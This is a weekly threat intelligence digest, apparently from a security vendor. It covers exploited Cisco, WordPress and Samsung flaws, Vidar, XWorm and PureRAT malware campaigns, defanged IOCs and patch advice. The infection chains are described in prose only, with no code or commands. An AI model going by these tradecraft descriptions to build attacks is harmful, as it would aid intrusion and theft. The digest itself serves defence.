Executive Summary -
Highlights of Cyber Threat Intelligence Digest
Vulnerabilities
Threat Actors Abuse Actively Exploited Cisco Firewall Flaws CVE-2025-20333 and CVE-2025-20362 to Conduct DDoS Attacks - Threat actors are actively exploiting two recently patched Cisco firewall vulnerabilities:CVE-2025-20333 and CVE-2025-20362, to conduct large-scale distributed denial-of-service (DDoS) attacks against unpatched Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) devices. The flaws, both addressed by Cisco on 25 September 2025, were updated in advisories on 5 November after new exploit variants were observed causing affected devices to enter continuous reboot loops, effectively taking networks offline.
Shadowserver reports that over 34,000 ASA and FTD instances remain exposed, and Cisco has confirmed active exploitation, though no specific threat actor has been named. External researchers have noted similarities to the 2024 ArcaneDoor campaign, which also targeted Cisco zero-days in government environments.
CVE-2025-20333 is a buffer overflow in Cisco’s web services that allows remote code execution via improperly validated HTTP(S) input from authenticated VPN users. CVE-2025-20362, a missing authorisation flaw in the VPN web server, enables unauthenticated attackers to access restricted URLs through crafted requests. When chained, these vulnerabilities grant remote attackers full control over affected VPN and WebVPN services.
Threat Actors Exploit WordPress Post SMTP Flaw CVE-2025-11833 for Account Takeover - Threat actors are actively exploiting CVE-2025-11833, a critical flaw in the Post SMTP WordPress plugin (versions 3.6.0 and earlier) that allows the takeover of administrator accounts. Wordfence first reported the campaign on 3 November 2025, noting over 4,500 attack attempts since 1 November.
The vulnerability arises from missing authorisation checks in the plugin’s PostmanEmailLogs class, enabling unauthorised disclosure of email logs containing password reset links. Exploitation allows attackers to reset administrator passwords and gain full control of affected sites.
A patch was released on 29 October 2025 with version 3.6.1, yet Wordfence estimates that around 210,000 WordPress sites remain exposed to active exploitation.
Threat Actors Exploit Samsung Galaxy Flaw, CVE-2025-21042, to Deploy LandFall Spyware - LANDFALL, a commercial-grade Android spyware family, has been observed exploiting an out-of-bounds write (CVE-2025-21042) in Samsung Galaxy devices running Android 13, 14 and 15 to conduct targeted surveillance. First reported by Palo Alto Networks on 7 November 2025, the campaign has been active since mid-2024 and focused on users in the Middle East, and abused malformed DNG images to deploy a loader and an SELinux manipulator, exfiltrating audio, messages and files and communicating with HTTPS command-and-control servers. Samsung issued a patch for CVE-2025-21042 in April 2025; at time of reporting the actor remains unattributed, though infrastructure and tradecraft resemble Middle East-based private offensive firms.
The infection chain begins with a malformed DNG that exploits libimagecodec.quram.so to unpack an appended ZIP containing the spyware. Exploitation launches two modules: b.so (a loader that fingerprints the device, registers a unique Agent ID and establishes encrypted HTTPS C2 over ephemeral ports) and l.so (which decompresses and alters SELinux to escalate privileges and persist). Post-execution activity includes staged downloads of native modules and DEX files, process injection and LD_PRELOAD abuse, monitoring WhatsApp media directories for additional payloads, anti-analysis checks, data exfiltration and cleanup.
Potential Threats
Threat Cluster MUT-4831 Uses npm Packages Masquerading as SDKs to Deliver Vidar Infostealer - On November 3, 2025, Datadog Security Research identified seventeen malicious npm packages distributing the Vidar infostealer—the first known instance of this malware being delivered through npm. Tracked as MUT-4831, the threat actors used new npm accounts (“aartje” and “saliii229911”) to upload packages impersonating legitimate SDKs, Telegram bot tools, and icon libraries. Once installed, these packages executed malicious post-install scripts in Node.js or PowerShell that fetched an encrypted ZIP from bullethost[.]cloud, extracted it with a hard-coded password, and launched a Go-compiled Vidar variant named bridle.exe. The payload harvested browser credentials, cookies, crypto wallets, and system files before exfiltrating the data to C2 servers using Telegram and Steam accounts linked to rotating domains.
After exfiltration, the malware self-deleted to evade detection. Datadog recorded over 2,000 downloads before npm removed the packages and banned the accounts, underscoring the ongoing risk of supply-chain compromise through open-source ecosystems.
New XWorm Campaign Uses PNG Files to Deploy XWorm - ANY.RUN analysts reported a new phishing campaign (PurchaseOrder_25005092.JS) that installs the XWorm RAT via a JavaScript installer which writes three staged components into C:\Users\PUBLIC, Kile[.]cmd, Vile[.]png, and Mands[.]png, where the PNG files are not images but Base64-encoded, AES-encrypted payload containers used as an in-memory loader. The heavily-obfuscated Kile[.]cmd reconstructs and runs a two-stage PowerShell chain: stage one decodes and AES-decrypts Mands[.]png and runs commands via Invoke-Expression, and stage two decodes/decrypts Vile[.]png and directly loads the resulting .NET assembly into memory to deploy XWorm.
The installer also creates a scheduled task for persistence; XWorm provides credential theft, lateral movement, and remote command execution capabilities, making this a compact, multi-stage phishing vector that uses anti-analysis and file masquerading to evade detection.
Threat Actors Deploy PureRAT via ClickFix in Booking.com-Themed Phishing Campaign Targeting Global Hospitality Sector - Between April and October 2025, Sekoia reported a widespread phishing campaign that used the ClickFix social-engineering lure to deliver the PureRAT remote access trojan to hotel administrator systems, resulting in the compromise of booking management accounts (Booking[.]com, Expedia, Airbnb) which were then sold or abused to phish guests.
The infection chain relied on spoofed Booking[.]com emails redirecting victims through a traffic-distribution system to a fake extranet page that coerced administrators into running a “verification” step; that led to malware that established persistence and executed an in-memory RAT used for credential theft and account takeover.
Stolen booking credentials were subsequently used to send seemingly legitimate reservation messages (email/WhatsApp) to guests, tricking them into entering payment details on phishing pages and enabling financial fraud, a profitable supply-chain style model in which account access is monetised or reused to scale scams.
General News
UK carriers to block spoofed phone numbers in fraud crackdown - Britain’s largest mobile carriers, including BT EE, Virgin Media O2, Vodafone Three, Tesco Mobile, TalkTalk, and Sky have signed a new Telecoms Charter with the UK government aimed at eliminating phone number spoofing within a year. Under the agreement, carriers will upgrade their networks to flag when calls originate from abroad and deploy advanced call-tracing technology to help police identify and dismantle scam operations. The initiative also introduces stronger data-sharing between telecom providers and law enforcement, alongside improved support for scam victims, including two-week response targets.
Operators report already blocking billions of scam texts and millions of fraudulent calls monthly through AI-based detection. The government says the move will make the UK “the hardest place in the world for scammers to operate,” addressing the growing threat of call spoofing, which remains one of the most common tools used in phone-based fraud.
Google warns of new AI-powered malware families deployed in the wild - Google’s Threat Intelligence Group (GTIG) has reported a significant development in malware evolution, with adversaries now integrating large language models (LLMs) directly into their malicious code. This new “just-in-time” self-modification technique allows malware to dynamically alter its behaviour mid-execution, creating adaptable and hard-to-detect threats. Google highlighted several examples, including PromptFlux, a VBScript dropper that uses the Gemini LLM to generate obfuscated variants and fetch new code for evasion, and PromptSteal (aka LameHug), a data miner deployed in Ukraine capable of dynamic script generation and on-demand functionality.
While PromptFlux remains in early development and has been cut off from the Gemini API, its design suggests a shift toward metamorphic, AI-driven malware. GTIG also identified other AI-enabled tools such as FruitShell, a PowerShell-based reverse shell; QuietVault, a JavaScript credential stealer targeting GitHub/NPM tokens; and PromptLock, an experimental Lua-based ransomware capable of operating across Windows, macOS, and Linux.
This research underscores how attackers are beginning to weaponise AI models themselves, leveraging their generative capabilities to evade detection and rapidly evolve code.
Cyber insurance claims surge 230% in the UK - UK insurers have reported a sharp increase in cyber-related payouts, with the Association of British Insurers (ABI) confirming that £197 million was paid out in 2024, a 230% rise from the previous year. This surge is driven primarily by ransomware and malware incidents, which accounted for over half of all claims.
This trend highlights the growing financial toll of cyberattacks on UK businesses and suggests that many organisations remain vulnerable despite having coverage. The report reinforces that cyber insurance should complement, not replace, robust security and incident response measures.
Threat Actor Weekly Graph
Over the past 7 days, we have been tracking the following intent and opportunity changes within our Threat Actor Landscape.
Intent represents the potential targets of a group. When a group is observed attacking a different organisation or entity, their intent will increase.
Opportunity represents the various methods and technologies these groups may use. For example, if a group started using a new attack vector, such as a new kind of ransomware, their opportunity would increase.
Both intent and opportunity are scored out of 100 and are responsible for scoring the group's severity. These updates can be seen below.
| ● Limited Severity | ● Basic Severity | ● Moderate Severity | ● High Severity |
| Threat Actor | Severity Increase | Opportunity | Intent | ||||||
|---|---|---|---|---|---|---|---|---|---|
| Sandworm Team | NEW | → | ● High | NEW | → | ● 77 | NEW | → | ● 25 |
| CL0P Ransomware Group (FancyCat) | ● High | → | ● High | ● 81 | → | ● 82 | ● 49 | → | ● 49 |
| Coinbase_CartelNew | NEW | → | ● Basic | NEW | → | ● 25 | NEW | → | ● 30 |
|
BlackNevas Ransomware Group |
NEW | → | ● Basic | NEW | → | ● 25 | NEW | → | ● 30 |
| KillSecurity Ransomware Group | ● Basic | → | ● Basic | ● 45 | → | ● 30 | ● 49 | → | ● 49 |
Global Trends Powered by Recorded Future
Within each category, we have provided the current top five globally trending items. Each item is linked to how actively trending it is and is marked with a small symbol.
The spikes in references are calculated over 60 days and are normalised to ensure they aren't disproportionate when compared to bigger entities that will naturally have more baseline mentions.
▲- Spike – This indicates a large increase in reporting volume and a high diversity in the event descriptions.
▲- Rise – This indicates a small increase in reporting volume with little diversity in the descriptions.
| Attackers | Methods | Vulnerabilities | Targets | |||||
|---|---|---|---|---|---|---|---|---|
| Interlock Ransomware Group | ▲ | Play Ransomware | ▲ | CVE-2025-62848 | ▲ |
Microsoft 365 Admin Centre |
▲ | |
|
Rey |
▲ |
EVEREST Ransomware |
▲ | CVE-2025-12917 | ▲ |
Samsung Galaxy |
▲ | |
|
Fin11 |
▲ | Obfuscated Files | ▲ | CVE-2025-59320 | ▲ |
Hyundai |
▲ | |
| FANCYCAT | ▲ |
Comebacker |
▲ | CVE-2024-32068 | ▲ | Mobile OS Systems | ▲ | |
|
DieNet |
▲ |
Local System Data |
▲ |
CVE-2025-59287 |
▲ |
Allianz |
▲ | |
Prominent Information Security Events
Threat Actors Deploy PureRAT via ClickFix in Booking.com-Themed Phishing Campaign Targeting Global Hospitality Sector
Source: Insikt Group | Validated Intelligence Event
IOC: IP - 77[.]83[.]207[.]106
IOC: SHA256 Hash - 703355e8e93f30df19f7f7b8800bd623f1aee1f020c43a4a1e11e121c53b5dd1
IOC: URL - update-info1676[.]com
IOC: Domain - hxxps[:]//verifyguest02667[-]booking[.]com/17149438
Between April and October 2025, unidentified threat actors ran a phishing campaign targeting the global hospitality sector. According to a 6 November 2025 report by Sekoia, the actors used the ClickFix social-engineering technique to deliver the PureRAT malware to hotel administrator systems, compromising booking-management accounts such as Booking.com, Expedia and Airbnb. The stolen credentials were reportedly sold on underground forums or used directly to distribute phishing messages to hotel guests.
Sekoia says the infection chain began with malicious emails sent to hotel administrators from compromised corporate accounts impersonating Booking.com. Those emails contained malicious URLs that redirected recipients to a spoofed website using a Traffic Distribution System (TDS) to conceal the actor’s infrastructure. The site hosted JavaScript that checked for iframe loading and reloaded the browser over HTTP, ultimately redirecting to a spoofed Booking.com extranet page. Using the ClickFix reCAPTCHA technique, the page prompted users to copy and execute a PowerShell command presented as a verification step.
Executing that command initiated a download from a /bomla path, which retrieved further PowerShell scripts that collected system information. The scripts also downloaded a ZIP archive containing an executable and three DLLs, extracted it into the AppData directory, and established persistence via Run registry keys and Start-up shortcuts. The executable triggered DLL side-loading to launch a loader that injected PureRAT into AddInProcess32.exe, enabling in-memory execution. Once active, PureRAT allowed the actors to compromise booking accounts, steal credentials and exfiltrate data.
Threat Cluster MUT-4831 Uses npm Packages Masquerading as SDKs to Deliver Vidar Infostealer
Source: Insikt Group | Validated Intelligence Event
IOC: Hash - aa49d14ddd6c0c24febab8dce52ce3835eb1c9280738978da70b1eae0d718925
IOC: Domain - iu[.]server24x[.]com
On November 3, 2025, Datadog Security Research reported the detection of seventeen malicious npm packages containing downloader malware that installed the Vidar infostealer on Windows systems. Datadog attributed the activity to the threat cluster MUT-4831 and described it as the first known instance of Vidar being distributed through npm. The threat actors used newly created npm accounts named “aartje” and “saliii229911” to publish the malicious packages, which npm later banned and removed from the registry. Datadog recorded more than 2,000 total downloads of the malicious packages before their removal.
MUT-4831 carried out the campaign by uploading npm packages that impersonated legitimate SDKs, Telegram bot helpers, and icon libraries. The threat actors configured these packages to run a malicious post-install script written in Node.js or embedded PowerShell once users installed them. The script downloaded an encrypted ZIP archive from bullethost[.]cloud, extracted its contents using a hard-coded password, and launched an executable named bridle.exe. Datadog’s analysis determined that bridle.exe was a Vidar infostealer variant that appears to have been compiled in Go. Bridle.exe collected browser credentials, cookies, cryptocurrency wallets, and system files, then packaged the stolen data into ZIP archives and sent them to command-and-control (C2) servers located through Telegram and Steam accounts containing frequently updated C2 domains. After exfiltrating the data, bridle.exe deleted itself to conceal activity and hinder detection.
Remediation Actions
Following the information provided above, we recommend that the technologies mentioned be fully patched and updated. We also want to highlight and recommend applying the following patches where applicable:
-
CVE-2025-20333 / CVE-2025-20362: These vulnerabilities can be remediated by upgrading Cisco ASA and FTD devices to the fixed versions released on 25 September 2025 or later, and ensuring all September and November 2025 security advisories are applied.
-
CVE-2025-11833: This vulnerability can be remediated by updating the Post SMTP WordPress plugin to version 3.6.1 or later.
-
CVE-2025-21042: This vulnerability can be remediated by applying Samsung’s April 2025 Android security update for Galaxy devices running Android 13, 14, and 15.
If you are currently an Acumen Cyber Vulnerability Management customer, we will be proactively performing related searching and hunting activities within your environment.